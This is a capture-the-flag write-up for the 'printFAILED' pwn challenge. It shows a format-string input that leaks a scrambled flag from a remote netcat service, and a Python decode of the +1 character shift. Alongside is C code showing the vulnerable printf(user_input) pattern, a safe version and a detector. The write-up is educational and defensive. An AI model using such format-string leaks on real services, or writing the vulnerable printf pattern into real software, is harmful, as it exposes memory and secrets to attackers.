printFAILED
Category: PWN
MEDIUM
I’m new to C. I just learned printf and everything just worked™. But my friend Greg, who works at a security company, tells me that some strings crashed the program but refused to tell me specifically which ones. (He wanted to publish those in DEF CON.) Can you find the magic string before he carries out his evil plan?
printFailed
https://cdn.discordapp.com/attachments/840090746463191060/840091409012490241/printFailed
Connect via
nc printf.sdc.tf 1337
Solution
Quick look into Ghidra
…
Local attempt…
cat flag.txt
sdctf{example_flag}
./printFailed
can you guess the scrambled flag?
%d %d %d %s
you guessed:
-666892177 -666892246 40 tedug|fybnqmf`gmbh~
wrong
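Why "%d %d %d %s" prints the scrambled flag: the guess reaches printf as the format string itself, so the fourth conversion dereferences whatever pointer sits in that argument slot. The C below is an added example, not the challenge's decompiled code; the function names are hypothetical and the vulnerable shape is assumed from the observed behaviour (it is compiled only with -DSHOW_VULNERABLE).

```c
#include <stdio.h>
#include <string.h>

#ifdef SHOW_VULNERABLE
/* Vulnerable shape (assumed): the guess IS the format string, so each
 * conversion in it makes printf fetch an argument the caller never passed,
 * i.e. whatever sits in the argument registers or on the stack. */
static void echo_guess_vulnerable(const char *guess)
{
    printf(guess);
}
#endif

/* Hardened shape: constant format string, the guess is only data.
 * Returns the number of characters the guess needs, as snprintf does. */
static int echo_guess_safe(char *out, size_t outlen, const char *guess)
{
    return snprintf(out, outlen, "%s", guess);
}

/* Returns 1 if s contains a '%' that is not part of a literal "%%".
 * Handy for flagging format-string probes in logged input. */
static int has_conversion(const char *s)
{
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {
            s++;            /* skip the second '%' of "%%" */
            continue;
        }
        return 1;
    }
    return 0;
}

int main(void)
{
    const char *guess = "%d %d %d %s";   /* input used in the write-up */
    char out[64];

    echo_guess_safe(out, sizeof out, guess);
    printf("you guessed:\n%s\n", out);   /* echoed verbatim, nothing leaked */
    printf("has conversion: %d\n", has_conversion(guess));
    return 0;
}
```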
Quick check (I could have looked into the decompiled scramble(), but this way was faster as I had a Python console open…).
# Compare the leaked prefix with the known flag prefix, character by character
for i, j in zip('tedug|', 'sdctf{'):
    print(ord(i), ord(j))
Output:
116 115
101 100
100 99
117 116
103 102
124 123
OK, so the value of each flag character is incremented by 1.
Final solution.
nc printf.sdc.tf 1337
can you guess the scrambled flag?
%d %d %d %s
you guessed:
1899030639 1899030570 40 tedug|E1ou`c4`5`g52mvs4`2jl4`uI2T`D1e4~
wrong
flag_encrypted = 'tedug|E1ou`c4`5`g52mvs4`2jl4`uI2T`D1e4~'
# Undo the scramble: shift every character back by 1
for i in flag_encrypted:
    print(chr(ord(i)-1), end='')
Output:
sdctf{D0nt_b3_4_f41lur3_1ik3_tH1S_C0d3}
Flag
sdctf{D0nt_b3_4_f41lur3_1ik3_tH1S_C0d3}